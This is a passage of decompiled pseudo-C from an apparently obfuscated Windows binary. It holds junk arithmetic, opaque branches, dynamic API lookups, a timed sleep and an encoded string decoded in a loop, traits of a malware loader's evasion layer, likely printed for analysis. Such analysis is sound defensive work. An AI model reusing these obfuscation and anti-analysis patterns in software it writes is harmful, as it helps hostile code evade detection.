				signed int _t1837;
				signed int _t1838;
				signed int _t1846;
				signed int _t1862;
				signed int _t1874;
				signed char _t1881;
				signed int _t1884;
				signed short _t1892;
				signed short _t1893;
				void* _t1895;
				signed int _t1897;
				signed int _t1900;
				signed short _t1904;
				struct HINSTANCE__* _t1914;
				signed int _t1917;
				signed int _t1922;
				signed short _t1925;
				signed int _t1926;
				signed short _t1928;
				signed char _t1936;
				signed int _t1938;
				signed int _t1942;
				signed int _t1944;
				signed short _t1947;
				signed int _t1961;
				signed int _t1981;
				signed int _t1992;
				signed int _t1993;
				signed int _t2002;
				signed int _t2004;
				signed char _t2006;
				signed short _t2013;
				signed char _t2014;
				signed int _t2020;
				void* _t2033;
				void* _t2036;
				signed int _t2037;
				signed int _t2040;
				signed char _t2051;
				signed short _t2052;
				signed int _t2055;
				signed int _t2063;
				long _t2065;
				signed int _t2066;
				signed int _t2073;
				signed int _t2081;
				void* _t2084;
				signed int _t2087;
				signed int _t2090;
				signed int _t2101;
				signed int _t2104;
				signed short _t2106;
				signed char _t2122;
				signed char _t2127;
				char _t2131;
				signed int _t2134;
				signed short _t2139;
				signed int _t2142;
				signed short _t2148;
				void* _t2155;
				signed char _t2162;
				signed int _t2167;
				signed short _t2176;
				signed int _t2182;
				signed short _t2184;
				signed int _t2185;
				signed int _t2193;
				signed int _t2194;
				void* _t2216;
				void* _t2221;
				void* _t2222;
				signed int _t2224;
				signed int _t2226;
				signed int _t2228;
				void* _t2229;
				signed int _t2230;
				signed int _t2231;
				void* _t2232;
				signed int _t2234;
				signed int _t2238;
				signed int _t2239;
				signed short _t2241;
				signed int _t2244;
				signed short _t2251;
				signed int _t2253;
				signed char _t2254;
				void* _t2264;
				signed int _t2266;
				signed int _t2272;
				signed int _t2281;
				long _t2286;
				signed int _t2287;
				short _t2310;
				signed int _t2312;
				signed char _t2314;
				signed short _t2316;
				signed int _t2340;
				signed int _t2342;
				signed int _t2346;
				signed int _t2348;
				signed int _t2352;
				signed int _t2353;
				signed int _t2356;
				signed int _t2399;
				signed char _t2406;
				signed int _t2415;
				signed int _t2418;
				signed int _t2419;
				void* _t2420;
				char _t2431;
				unsigned int _t2442;
				signed short _t2453;
				signed short _t2455;
				signed int _t2457;
				signed int _t2487;
				signed int _t2491;
				signed int _t2493;
				signed int _t2506;
				signed int _t2510;
				signed int _t2519;
				signed int _t2521;
				signed int _t2523;
				signed int _t2538;
				signed int _t2540;
				signed int _t2542;
				signed int _t2547;
				signed short _t2548;
				signed int _t2570;
				signed int _t2577;
				signed int _t2582;
				signed int _t2585;
				char _t2594;
				signed int _t2598;
				signed int _t2608;
				signed int _t2611;
				signed int _t2612;
				signed char _t2617;
				signed int _t2619;
				signed int _t2621;
				signed short _t2625;
				signed int _t2629;
				void* _t2634;
				signed int _t2636;
				signed int _t2638;
				signed int _t2658;
				signed int _t2661;
				signed char _t2682;
				signed int _t2685;
				signed int _t2692;
				signed int _t2707;
				signed int _t2714;
				void* _t2715;
				signed int _t2719;
				signed int _t2721;
				signed int _t2723;
				long _t2726;
				signed int _t2728;
				signed short _t2731;
				signed int _t2732;
				signed int _t2734;
				signed int _t2740;
				signed int _t2749;
				signed int _t2750;
				signed int _t2768;
				signed int _t2774;
				signed int _t2778;
				signed int _t2781;
				signed int _t2817;
				signed int _t2823;
				signed int _t2837;
				signed int _t2838;
				signed int _t2839;
				signed int _t2845;
				signed int _t2846;
				signed int _t2856;
				signed int _t2857;
				signed char _t2859;
				signed int _t2863;
				signed int _t2869;
				signed short _t2871;
				signed int _t2880;
				signed int _t2888;
				signed int _t2891;
				signed int _t2892;
				signed int _t2906;
				signed int _t2912;
				signed int _t2914;
				signed int _t2928;
				signed int _t2933;
				signed int _t2937;
				signed int _t2938;
				signed int _t2961;
				signed int _t2969;
				signed int _t2979;
				signed int _t2987;
				signed int _t2996;
				char _t2997;
				short _t2998;
				signed int _t3000;
				signed char _t3002;
				signed char _t3004;
				signed int _t3007;
				signed int _t3014;
				signed int _t3025;
				signed int _t3027;
				signed short _t3029;
				WCHAR* _t3030;
				signed int _t3047;
				signed int _t3050;
				signed int _t3052;
				signed int _t3056;
				signed int _t3058;
				signed short _t3059;
				signed int _t3062;
				struct HINSTANCE__* _t3069;
				signed int _t3073;
				signed int _t3077;
				signed int _t3083;
				signed int _t3084;
				signed int _t3096;
				signed int _t3099;
				signed int _t3101;
				signed int _t3103;
				signed int _t3105;
				signed int _t3110;
				signed int _t3111;
				signed int _t3112;
				signed short _t3115;
				long _t3123;
				signed int _t3127;
				signed int _t3129;
				signed int _t3132;
				signed int _t3138;
				signed int _t3144;
				signed int _t3149;
				signed int _t3157;
				signed int _t3158;
				signed int _t3168;
				signed int _t3179;
				signed int _t3182;
				signed int _t3183;
				signed int _t3186;
				signed int _t3213;
				signed int _t3222;
				signed int _t3237;
				signed int _t3241;
				long _t3243;
				signed int _t3247;
				unsigned int _t3256;
				signed int _t3263;
				long _t3270;
				struct HINSTANCE__* _t3281;
				signed int _t3283;
				signed short _t3284;
				signed int _t3288;
				signed int _t3289;
				signed int _t3293;
				signed int _t3299;
				signed int _t3303;
				signed int _t3312;
				signed int _t3315;
				signed char _t3319;
				signed int _t3321;
				signed int _t3322;
				signed int _t3325;
				signed int _t3330;
				signed int _t3336;
				signed int _t3350;
				signed int _t3354;
				long _t3355;
				signed int _t3366;
				signed int _t3372;
				long _t3373;
				signed char _t3376;
				signed int _t3377;
				signed int _t3383;
				signed int _t3384;
				signed int _t3389;
				short* _t3391;
				signed char _t3393;
				signed int _t3395;
				signed short _t3405;
				signed int _t3406;
				signed int _t3418;
				signed char _t3421;
				struct HWND__* _t3422;
				signed int _t3426;
				signed int _t3436;
				signed short _t3442;
				signed int _t3444;
				signed int _t3448;
				signed int _t3451;
				signed int _t3458;
				signed int _t3460;
				signed int _t3466;
				signed short _t3468;
				signed int _t3469;
				signed int _t3472;
				signed int _t3474;
				signed int _t3484;
				void* _t3495;
				signed int _t3498;
				char _t3502;
				struct HINSTANCE__* _t3506;
				signed int _t3507;
				signed short _t3511;
				signed short _t3512;
				signed int _t3514;
				signed int _t3524;
				signed int _t3528;
				signed int _t3530;
				signed int _t3537;
				signed int _t3538;
				signed int _t3542;
				signed int _t3543;
				void* _t3544;
				void* _t3545;
				signed int _t3546;
				signed int _t3547;
				signed int _t3548;
				void* _t3553;
				void* _t3554;
				signed int _t3556;
				signed int _t3561;
				signed int _t3562;
				signed int _t3563;
				void* _t3564;
				signed int _t3569;
				signed int _t3570;
				signed int _t3578;
				void* _t3579;
				signed int _t3585;
				void* _t3595;
				signed short _t3599;
				void* _t3601;
				void* _t3608;
				void* _t3619;
				signed int _t3633;
				void* _t3634;
				void* _t3640;
				void* _t3662;
				void* _t3663;
				void* _t3667;
				void* _t3672;
				void* _t3676;
				void* _t3703;
				void* _t3709;
				void* _t3719;

				_t2316 =  *0x1000cf8; // 0xffff
				asm("cdq");
				_v164 = _t2316 & 0x0000ffff;
				_v160 = __edx;
				_v16 =  *0x1000ca0 & 0x000000ff;
				_t1420 =  *0x1000cf0; // 0xd43579fe
				_t3542 =  *0x1000cd8; // 0x6dc8
				_v132 = _t3542;
				_v6 = 0xd1;
				_v5 = 0xb7;
				_v13 =  *0x1000d10 & 0x000000ff;
				_t2937 =  *0x1000cf4; // 0x2b91c
				_v60 = _t1420;
				_v56 = _t2937;
				_t3511 =  *0x1000ce8; // 0x4
				asm("cdq");
				_v124 = _t3511 & 0x0000ffff;
				_t1422 =  *0x1000c88; // 0xa666078f
				_v120 = _t2937;
				_t2938 =  *0x1000d00; // 0xfffff835
				_v11 = 0x4e;
				_v19 = 0xea;
				_v148 = _t1422;
				_t1423 =  *0x1000cec; // 0x9b7c
				_v136 = _t3542;
				_v68 = 0x37bc9c62;
				_v64 = 0x16f32;
				_v144 = _t1423;
				_v9 = _t2938;
				_v140 = _t2938;
				_v32 = 0xffffab46;
				_v100 =  *0x1000d18 & 0x0000ffff;
				_v40 =  *0x1000d08 & 0x0000ffff;
				_v128 =  *0x1000cd2;
				_v28 = 0x8e31;
				_v96 = 0x2bd7;
				_v14 = 0x5f;
				_v44 = _t1423 & 0x0000ffff;
				_t1425 =  *0x1000cd0; // 0x0
				_v12 = _t1425;
				_v17 = _t1425;
				_v116 = 0x84;
				_v10 = 0xb2;
				asm("cdq");
				_v92 = _t2316 & 0x0000ffff;
				_v88 = 0x2bd7;
				_v52 = M01000CB0 & 0x0000ffff;
				_v8 = 0xa4;
				_v48 = 0xf9;
				_v7 =  *0x1000ce0 & 0x000000ff;
				_v76 = 0x4ab9e448;
				_v72 = 0x2bc91;
				_v80 = _t3511 & 0x0000ffff;
				_v18 = 0x44;
				_v15 =  *0x1000d20 & 0x000000ff;
				_v164 = 0x6848;
				_t2286 = 0;
				_v160 = 0;
				_v112 = 4;
				_v108 = 0x4254;
				_v104 = 0;
				_v24 =  *0x1215420;
				_t1429 =  *0x1000ce8; // 0x4
				 *0x1000cdc = (_v32 & 0x0000ffff) + 0x27ec8fde;
				 *0x1000ce8 = (_t1429 + _t1429 & 0x0000ffff) - (_v18 & 0x000000ff);
				 *0x1000c9c = 2;
				_v308 = _v24 + 0x74;
				 *0x1000ca0 =  !_v44;
				_v188 = _v24 + 0x3e7;
				_v140 =  *0x1215420;
				_v312 = _v24 + 0x196;
				 *0x1000c83 = _v44 + 0x15;
				_v11 = (_v48 & 0x0000ffff) + 0xd2d;
				_v24 =  *0x1215420;
				_v316 = _v24 + 0x62;
				if((_v164 | _v160) == 0) {
					if((_v10 & 0x000000ff ^  *0x1000cdc) == 0) {
						_t2928 =  *0x1000cc0; // 0xffff970a
						__eflags = _t2928 |  *0x1000cc4;
						if((_t2928 |  *0x1000cc4) != 0) {
							_v5 = _v140;
							_t3506 =  *0x1215420;
							 *0x1000d08 = _t3506;
							asm("cdq");
							_t2933 = (_v19 & 0x000000ff) + (_v19 & 0x000000ff) + (_v19 & 0x000000ff) + (_v19 & 0x000000ff) + (_v19 & 0x000000ff) + (_v19 & 0x000000ff) + (_v19 & 0x000000ff) + (_v19 & 0x000000ff);
							__eflags = _t2933;
							 *0x1000cec = _t2933;
							 *0x1000d10 = _v14 & 0x000000ff;
							 *0x1000d14 = _t3506;
						}
					} else {
						_t3507 =  *0x1000d18; // 0x0
						_t2281 =  *0x1000d1c; // 0x0
						asm("adc eax, ebx");
						 *0x1000c8c =  ~_t2281;
						 *0x1000c88 =  ~_t3507;
						 *0x1000c9f = 0xb2;
						_v6 =  *0x1215420;
						 *0x1000ca4 = _v6 - 0xcf47;
					}
				}
				_v188 = _v24 + 0x3eb;
				_v188 = _v24 + 0x23b;
				_v24 =  *0x1215420;
				_v36 = _v24 + 0x122;
				if( *0x1000cb8 == 0x31) {
					_t3608 =  *0x1000cbc - _t2286; // 0x0
					if(_t3608 == 0) {
						_v144 = 0xb4;
						 *0x1000c9c = _v19 - (_v14 & 0x000000ff) + 0x83;
					}
				}
				_v172 = _v24 + 0x3f9;
				_t2961 =  *0x1000d10; // 0x0
				_v172 = _v24 + 0x37c;
				 *0x1000c9c =  *0x1000c9a - 0x65;
				_v40 = _v40 + _t2961;
				_v24 =  *0x1215420;
				_t3543 = _t3542 | 0xffffffff;
				if((0 | _v40 == _v5) < (0 | _v40 == 0x0000004b)) {
					_t1446 =  *0x1000c9c; // 0x250000d4
					 *0x1000c9c = (_t1446 -  *0x1000ce8) * _t1446;
					_v132 = 8;
					asm("cdq");
					 *0x1000ce0 =  *0x1000ce0 - _v5 + 0xb0ef;
					asm("sbb [0x1000ce4], edx");
					_t2969 = (_v32 ^ 0xffffb5ab) -  *0x1000c98;
					__eflags = _t2969;
					 *0x1000d20 = _t2969;
				} else {
					_t2272 =  *0x1000ca8; // 0x7b8b5249
					_t3502 =  *0x1000c9a; // -110
					 *0x1000cc0 =  *0x1000cc0 + _t3543;
					_v96 = ( *0x1000cd4 & 0x0000ffff) >> 2;
					asm("adc [0x1000cc4], esi");
					 *0x10ae24f = _t3502;
					_v140 = _t2272 + 0xf24a06c9;
					 *0x1000ca0 =  *0x1000c9f +  *0x1000c9f +  *0x1000c9f +  *0x1000c9f +  *0x1000c9f +  *0x1000c9f +  *0x1000c9f +  *0x1000c9f;
				}
				_v200 = _v24 + 0x25d;
				_v172 = _v24 + 0x279;
				_t3512 = 1;
				_v76 = 1;
				_v72 = _t2286;
				_t1452 = _v76;
				 *0x1000ca4 =  *0x1000ca4 + _v48;
				_t2340 = _v72;
				 *0x1000c9e = 2;
				if((_t1452 | _t2340) == 0) {
					_t2342 =  *0x1000ca0; // 0x5247
					 *0x1000cd4 =  *0x1000cd4 + 0x7fff - _v68;
					_v48 = _t2342 + 0x3cc6;
					_v176 = _t2286;
					__eflags =  *0x1000cec - _t2286; // 0x9b7c
					if(__eflags != 0) {
						_t1455 = 0;
						__eflags = 0;
					} else {
						_t1455 = 1;
					}
					__eflags =  *0x1000cd8 - _t2286; // 0x6dc8
					_t2346 =  *0x1000cc0; // 0xffff970a
					_t2979 = (_v148 * 0xc987497f ^ (0 | __eflags == 0x00000000)) * (_t2346 & _t1455) *  *0x1000cc8;
					__eflags = _t2979;
					 *0x1000c84 =  ~_t2979;
				} else {
					if(_t1452 == 1 && _t2340 == _t2286) {
						 *0x1000c9a = _v32 + 0x4c;
						_v68 = 0xb7b05bbd;
						_v64 = 0xf569e;
					}
				}
				_v176 = _v24 + 0x23e;
				_t1456 = 0x1db;
				do {
					_t2348 =  *0x1000c88; // 0xa666078f
					_v124 = _t2348 & 0x000000ff;
					_v120 = _t2286;
					_v96 = _v96 + _t3512;
					_t1456 = _t1456 - _t3512;
				} while (_t1456 != 0);
				_v208 = _t1456;
				_v204 = _t1456;
				_v212 = _t2286;
				_v2580 = 0;
				E00ECAA20(_t3512,  &_v2578, _t2286, 0x7fe);
				if(_v36 != (_v36 ^ 0x00000367)) {
					_t3619 =  *0x1000cb4 - _t2286; // 0x51
					if(_t3619 == 0 ||  !(_v9 & 0x000000ff) == 0) {
						_t1922 = 0;
						__eflags = 0;
					} else {
						_t1922 = _t3512;
					}
					if( *0x1000d08 <  !_t1922) {
						L31:
						__eflags = _v128 -  *0x1000cb8; // 0x4
						if(__eflags != 0) {
							L33:
							_t1925 = _t3512;
						} else {
							__eflags = 0 -  *0x1000cbc; // 0x0
							if(__eflags == 0) {
								_t1925 = 0;
								__eflags = 0;
							} else {
								goto L33;
							}
						}
						__eflags = _t1925 - (_v7 & 0x000000ff) - ( *0x1000c9b & 0x000000ff);
						if(_t1925 < (_v7 & 0x000000ff) - ( *0x1000c9b & 0x000000ff)) {
							_t1926 =  *0x1000d10; // 0x0
							__eflags = _t1926 |  *0x1000d14;
							if((_t1926 |  *0x1000d14) != 0) {
								_t1928 = 0;
								__eflags = 0;
							} else {
								_t1928 = _t3512;
							}
							__eflags =  !(_t1928 + 0x24) -  *0x1000ca4; // 0x9b27
							if(__eflags == 0) {
								__eflags = _v8;
								if(_v8 != 0) {
									__eflags = _v18 | _v28 & 0x0000ffff;
									_v176 = _t2286;
									if((_v18 | _v28 & 0x0000ffff) != 0) {
										_t2251 = 0;
										__eflags = 0;
									} else {
										_t2251 = _t3512;
									}
									_t2906 = (_v92 ^  *0x1000cf8) + _t2251;
									_t2253 = _v10 & 0x000000b4;
									__eflags = _t2253;
									 *0x1000c9b = _t2253;
									goto L47;
								}
							} else {
								_t2254 =  *0x1000cd2; // -114
								_t3495 = M01000CB0; // 0x0
								 *0x1000cd2 = _t2254 & _t3495 + _t2254;
								asm("sbb ecx, ecx");
								_t2906 =  ~((_v28 & 0x0000ffff) + 0x56) + 1;
								 *0x1000c83 = ( *0x1000c90 & 0x000000ff) *  *0x1000c83;
								L47:
								 *0x1000d20 = _t2906;
							}
						} else {
							asm("cdq");
							_v76 = _v76 + ( *0x11a1f1e & 0x0000ffff);
							asm("adc [ebp-0x44], edx");
							_t3498 =  *0x1000c88; // 0xa666078f
							_v116 = 0x3b978e29;
							 *0x1000cd4 = _t3498 * 0xb4c1;
						}
					} else {
						if(_v17 != 0) {
							L30:
							_t2264 = M01000CB0; // 0x0
							 *0x1000ca4 = _t2264 - (_v60 |  !_v48 ^  *0x1000ca8);
						} else {
							_t2266 =  *0x1000cb8; // 0x4
							_t2912 =  *0x1000cbc; // 0x0
							if(( !_t2266 |  !_t2912) != 0) {
								goto L30;
							} else {
								_t2914 =  *0x1000cf0; // 0xd43579fe
								if((_t2914 |  *0x1000cf4) == 0) {
									goto L31;
								} else {
									goto L30;
								}
							}
						}
					}
					_t3281 =  *0x1000cc8; // 0x1
					_v24 =  *0x1215420;
					GetProcAddress(_t3281, "GetTickCount");
					_v176 = _v24 + 0x2c8;
					_v136 = E00EC1190() & 0x000000ff;
					_t1936 = _v24 + 0x3ee;
					_v176 = _t1936;
					_t3283 = _v56;
					KiUserExceptionDispatcher(_v60, 4); // executed
					 *0x1000c9b = _t1936;
					if(_t1936 > 0) {
						asm("sbb edx, edx");
						asm("sbb eax, eax");
						if(_t3283 + 1 >= _v80 + 1) {
							asm("retf 0x8966");
							 *((intOrPtr*)(_t2286 - 0x3afa13bb)) =  *((intOrPtr*)(_t2286 - 0x3afa13bb)) - 1;
						}
					}
					_t1938 = _v24 + 0x3c5;
					_v184 = _t1938;
					__imp__CoInitialize(_t2286); // executed
					if(_t1938 != 0) {
						_t3284 =  *0x1000c9c; // -44
						_t1942 =  !(_v9 & 0x000000ff) *  *0x1000cdc;
						 *0x1000cd2 =  *0x1000cd2 + _t3284 + 1;
						_t2682 =  *0x1000c83; // -82
						_t546 = _t1942 - 0x3163d1f5; // -207868192
						 *0x1000c84 = (_v28 & 0x0000ffff) + _t546;
						_t1944 =  *0x1000d00; // 0xfffff835
						 *0x1000c83 = _t2682 + _t2682 +  *0x1000cc0;
						_t2685 =  *0x1000d04; // 0xffffffff
						asm("adc ecx, ebx");
						__eflags = _t1944 + _t3512 | _t2685;
						_v24 =  *0x1215420;
						if((_t1944 + _t3512 | _t2685) != 0) {
							_t1947 = 0;
							__eflags = 0;
						} else {
							_t1947 = _t3512;
						}
						_t3288 =  *0x1000cbc; // 0x0
						_t3289 =  *0x1000cb8; // 0x4
						_v60 = E00ECEE50(_t1947, 0, _t3289, _t3288);
						_v56 = _t3289;
						_v16 = _v52 + _v52;
						 *0x1000d20 = 0x6711;
						_v36 = _v24 + 0x3ce;
						asm("cdq");
						 *0x1000d00 =  *0x1000d00 -  *0x1000c9e - 0x6d3b;
						 *0x120f0f4 = _v44;
						asm("sbb [0x1000d04], edx");
						_v176 = _v24 + 0x156;
						_v40 = 4;
						_t3293 = _v120;
						asm("adc edx, esi");
						__eflags = _v68 | _v64;
						 *0x1000ce0 = _v124 + 0xbeee7d95;
						 *0x1000ce4 = _t3293;
						if((_v68 | _v64) != 0) {
							_t2692 = 0;
							__eflags = 0;
						} else {
							_t2692 = _t3512;
						}
						asm("cdq");
						_v68 =  !_v148 * _t2692;
						_v64 = _t3293;
						_t1961 = _v40;
						__eflags = _t1961 - 4;
						if(_t1961 <= 4) {
							switch( *((intOrPtr*)(_t1961 * 4 +  &M00EC7884))) {
								case 0:
									 *0x1000cd4 =  *0x1000cd4 +  *0x1000cd4 -  *0x1000c94;
									goto L216;
								case 1:
									__cx = _v48;
									__ax = _v96;
									_v48 = _v48 >> __cl;
									goto L216;
								case 2:
									__eax =  *0x1000c9c;
									__ecx =  *0x1000cec & 0x0000ffff;
									__edx =  *0x1000cb4; // 0x51
									 *0x1000c9c + 0x6c =  ~( *0x1000c9c + 0x6c);
									asm("sbb eax, eax");
									 ~( *0x1000c9c + 0x6c) + 1 =  ~( *0x1000c9c + 0x6c) + 1 + ( *0x1000cec & 0x0000ffff);
									__cx = _v100;
									__edx =  !__edx;
									__dx = __dx + __cx;
									__ecx = __dx & 0x0000ffff;
									__edx = _v112;
									(__dx & 0x0000ffff) - _v112 = (__dx & 0x0000ffff) - _v112 + _v116;
									__dl = _v14;
									__edx = __dl & 0x000000ff;
									 ~( *0x1000c9c + 0x6c) + 1 + ( *0x1000cec & 0x0000ffff) - (__dl & 0x000000ff) =  ~( ~( *0x1000c9c + 0x6c) + 1 + ( *0x1000cec & 0x0000ffff) - (__dl & 0x000000ff));
									asm("sbb eax, eax");
									__eax =  ~( ~( *0x1000c9c + 0x6c) + 1 + ( *0x1000cec & 0x0000ffff) - (__dl & 0x000000ff)) + 1;
									__ecx =  !((__dx & 0x0000ffff) - _v112 + _v116);
									__cx = __cx + __ax;
									__al =  *0x1000ca4; // 0x27
									 *0x1000cd4 = __cx;
									__ecx =  *0x1000c9b & 0x000000ff;
									__edx = 0x513f1156;
									__al = __al + 0x45;
									__edx = 0x513f1156 - ( *0x1000c9b & 0x000000ff);
									 *0x1000cdc =  *0x1000cdc + 0x513f1156 - ( *0x1000c9b & 0x000000ff);
									 *0x1000c9a = __al;
									goto L216;
								case 3:
									_v144 = _v144 + __edi;
									__ax = _v136;
									__dl = _v5;
									_v136 & 0x0000ffff = (_v136 & 0x0000ffff) * 0x67;
									__ax = __dl;
									 *0x1000cdc = (_v136 & 0x0000ffff) * 0x67;
									__ecx = 0x59b0;
									__ax = __dl - __cx;
									 *0x1000d20 = __ax;
									_v124 = _v124 | _v120;
									__eflags = _v124 | _v120;
									if((_v124 | _v120) != 0) {
										__eax = 0;
										_v40 = __ax;
									} else {
										__eax = __edi;
										_v40 = __ax;
									}
									goto L216;
								case 4:
									__edx =  *0x1000cf0;
									__eax =  *0x1000cf4; // 0x2b91c
									__cl =  *0x1215420;
									__edx =  *0x1000cf0 - 0xcb1e;
									asm("sbb eax, ebx");
									 *0x1000c83 =  *0x1000c83 + 1;
									 *0x1000ccc = __eax;
									_v108 = _v108 | _v104;
									__eflags = _v108 | _v104;
									 *0x1000cc8 =  *0x1000cf0 - 0xcb1e;
									 *0x1000c9a =  *0x1215420;
									if((_v108 | _v104) != 0) {
										__eax = 0;
										__eflags = 0;
									} else {
										__eax = __edi;
									}
									__dl =  *0x1000cf0; // -2
									__dl = __dl +  *0x1000c83;
									__dl = __dl - 0x6d;
									__dl = __dl - __al;
									_v15 = __dl;
									__eax = _v52 & 0x0000ffff;
									__eax = (_v52 & 0x0000ffff) * 0xabcc;
									__eflags = __eax;
									_v18 = __al;
									goto L216;
							}
						}
						L216:
						_v176 = _v24 + 0xcc;
						 *0x1000cc0 =  *0x1215420;
						 *0x1000cc4 = _t2286;
						__eflags = _v176 + 0x71 - (_v36 + _v36) * _v36;
						if(_v176 + 0x71 != (_v36 + _v36) * _v36) {
							_v116 = _v116 * _v128 + _v116;
							_v40 = 2;
							_v96 = (_v40 & 0x0000ffff) + 0x4b6e;
							_v96 = (_v96 & 0x0000ffff) -  *0x1151cd4;
							_t3299 =  *0x1000c94; // 0x0
							_v136 = _v136 & 0x0000ffff & _v136 & 0x0000ffff &  *0x1000cc8;
							_v6 = _t3299 << 7;
							_v44 = _v44 + ( *0x1000cec & 0x0000ffff);
							_v303 = 0x95;
							_v286 = 0x95;
							_v297 = 0x4d;
							_v294 = 0x4d;
							_v288 = 0x4d;
							_v284 = 0x99;
							_v282 = 0x4d;
							_v275 = 0x99;
							_v269 = 0x4d;
							_v265 = 0x4d;
							_v290 = 0x9c;
							_v264 = 0x9c;
							_v304 = 0x81;
							_v302 = 0x92;
							_v301 = 0x9f;
							_v300 = 0x92;
							_v299 = 0x54;
							_v298 = 0xa0;
							_v296 = 0x8e;
							_v295 = 0x9b;
							_v293 = 0x92;
							_v292 = 0x9f;
							_v291 = 0x9f;
							_v289 = 0x9f;
							_v287 = 0xa4;
							_v285 = 0x96;
							_v283 = 0x92;
							_v281 = 0x96;
							_v280 = 0x9b;
							_v279 = 0x96;
							_v278 = 0xa1;
							_v277 = 0x96;
							_v276 = 0x8e;
							_v274 = 0x96;
							_v273 = 0xa7;
							_v272 = 0x96;
							_v271 = 0x9b;
							_v270 = 0x94;
							_v268 = 0x70;
							_v267 = 0x7c;
							_v266 = 0x7a;
							_v263 = 0x8f;
							_v262 = 0x97;
							_v261 = 0x92;
							_v260 = 0x90;
							_v259 = 0xa1;
							_v258 = 0x5b;
							_v132 = (_v132 & 0x0000ffff) + ( *0x1000c83 & 0x000000ff);
							 *0x1000c98 = 0x8738;
							_v10 =  *0x1215420;
							_t3303 = _v11;
							 *0x1000c84 = _t3303 * 0x92f57aa5;
							_t3578 = 0;
							__eflags = 0;
							do {
								asm("cdq");
								 *0x1000cc0 =  *0x1000cc0 &  *0x1124b98;
								 *0x1000cc4 =  *0x1000cc4 & _t3303;
								asm("cdq");
								_t2707 = _v92 ^  *0x1000c9f | _v88 ^ _t3303;
								__eflags = _t2707;
								if(_t2707 != 0) {
									_t1981 = 0;
									__eflags = 0;
								} else {
									_t1981 = _t2707 + 1;
								}
								_v80 = _t1981 ^  *0x1000ca4;
								_v40 = _v17 ^  *0x1000c9a;
								 *0x1000c88 = 0x417cc4e;
								 *0x1000c8c = 0;
								GetProcAddress( *0x1000d08, "GetCommandLineW");
								_t3303 = ( *(_t3601 + _t3578 - 0x12c) & 0x000000ff) + 0x000000d3 & 0x000000ff;
								 *(_t3601 + _t3578 * 2 - 0x210) = _t3303;
								_t3578 = _t3578 + 1;
								__eflags = _t3578 - 0x2f;
							} while (_t3578 < 0x2f);
							_v48 = 1;
							_v438 = 0;
							Sleep(0xbb8);
							__eflags =  *0x1000c84 - ( *0x1000cec & 0x0000ffff); // 0x52f68420
							if(__eflags != 0) {
								asm("cdq");
								 *0x1000ca8 =  *0x1000ca8 -  *0x1000c9a;
								_v52 = _v52 & 0x0000ffff &  *0x1000cd2;
								_v9 = 0xc6;
								asm("sbb [0x1000cac], edx");
								 *0x1000cd2 =  *0x1000cd2 + _v5 + _v5 + _v5 + _v5;
								_t2714 = _v80 >> 3;
								__eflags = _t2714;
								_v132 = _t2714;
							} else {
								__eflags =  *0x1000cdc -  *0x1000c9e;
								if( *0x1000cdc >  *0x1000c9e) {
									_t2715 = M01000CB0; // 0x0
									__eflags = 0 -  *0x1000d14; // 0x0
									if(__eflags > 0) {
										L228:
										_t1992 = 0;
										__eflags = 0;
									} else {
										if(__eflags < 0) {
											L227:
											_t1992 = 1;
										} else {
											__eflags = _t2715 -  *0x1000d10; // 0x0
											if(__eflags > 0) {
												goto L228;
											} else {
												goto L227;
											}
										}
									}
									_v17 - _v148 = _v17 != _v148 | _t1992;
									if((_v17 != _v148 | _t1992) == 0) {
										_t1993 =  *0x1000c90; // 0xffff571c
										_t3312 =  *0x1000d08 * _t1993 * _t1993;
										 *0x1000c90 = _t3312;
										_v136 = _v136 + 1;
										asm("cdq");
										 *0x1000ce0 = (_v10 & 0x000000ff) * 0x18bc;
										 *0x1000ce4 = _t3312;
									}
								}
							}
							OutputDebugStringW( &_v532);
							goto L233;
						}
					} else {
						_t2719 =  *0x1000cc0; // 0xffff970a
						 *0x1000c9e =  *0x1000c9e + 1;
						_v40 = _v40 - (_t2719 * 0x0000021c & 0x0000ffff);
						_t3315 =  *0x1000cc0; // 0xffff970a
						_v144 = _t3315 + _t3315;
						 *0x1000ca4 = 0xe8f3;
						_t2721 =  *0x1215420;
						_v24 = _t2721;
						_v6 = _v19 - 0x35;
						_v112 = 0xb3a5;
						 *0x1000c9b =  *0x1000c9b + 0x69;
						_v36 = _v24 + 0xf07f;
						_t2723 = _v24 + 0xc716;
						_v168 = _t2723;
						_t2002 =  *0x1000d04; // 0xffffffff
						 *(_t2723 - 0xa36b) =  *(_t2723 - 0xa36b) & _t2723;
						asm("invalid");
						_t2004 = 0x1000cc4 + (_t2002 | 0xc2830100);
						_t3633 = _t2004;
						if(_t3633 >= 0) {
							if(_t3633 > 0) {
								L60:
								asm("sbb eax, eax");
								_t2234 =  ~( *0x1000d08);
								asm("sbb edx, edx");
								if(_t2234 >=  ~_v80) {
									_t2891 =  *0x1000d00; // 0xfffff835
									_t3472 =  *0x1000d04; // 0xffffffff
									__eflags = _t2891 | _t3472;
									if((_t2891 | _t3472) == 0) {
										L69:
										_t3512 = 0;
										__eflags = 0;
									} else {
										__eflags =  *0x1000d08 - _t2286; // 0xd72e
										if(__eflags == 0) {
											goto L69;
										}
									}
									__eflags =  *0x1000c98 - _t2286; // 0x0
									if(__eflags != 0) {
										_t3599 = 0;
										__eflags = 0;
									} else {
										_t3599 = 1;
									}
									_t2723 =  !_t2891;
									__eflags =  !_t3472;
									if(__eflags > 0) {
										L77:
										_t2238 = 0;
										__eflags = 0;
									} else {
										if(__eflags < 0) {
											L76:
											_t2238 = 1;
										} else {
											__eflags = _t2723 - _t3599;
											if(_t2723 >= _t3599) {
												goto L77;
											} else {
												goto L76;
											}
										}
									}
									_t2004 = _t2238 * _t3512;
									__eflags = _t2004;
									if(_t2004 != 0) {
										_t2892 = _v8 & 0x000000ff;
										_t3474 =  *0x1000cec; // 0x9b7c
										_t2239 =  *0x1000ca8; // 0x7b8b5249
										__eflags = _t2239 |  *0x1000cac;
										_v8 = _t2892 ^ _t3474;
										if((_t2239 |  *0x1000cac) != 0) {
											_t2241 = 0;
											__eflags = 0;
										} else {
											_t2241 = 1;
										}
										_t2004 = _v52 & 0x0000ffff;
										_t2723 =  *0x1215420;
										_t3484 =  !(_v12 - _v108) + _t2241 +  *0x1000cc8 - (_v52 & 0x0000ffff) + _v52 + _t2004 + 1;
										__eflags = _t3484;
										 *0x1000c9b = _t3484;
										 *0x1000c83 = _t2723;
									}
								} else {
									__imp__GetThreadUILanguage();
									 *0x1000cec = _t2234;
									if(_v52 == 0 ||  !_v48 == 0) {
										_t2004 = 0;
										__eflags = 0;
									} else {
										_t2004 = _t3512;
									}
									_t2723 =  *0x1000ce8 & 0x0000ffff;
									_t3640 = _t2723 -  *0x1000ca4; // 0x9b27
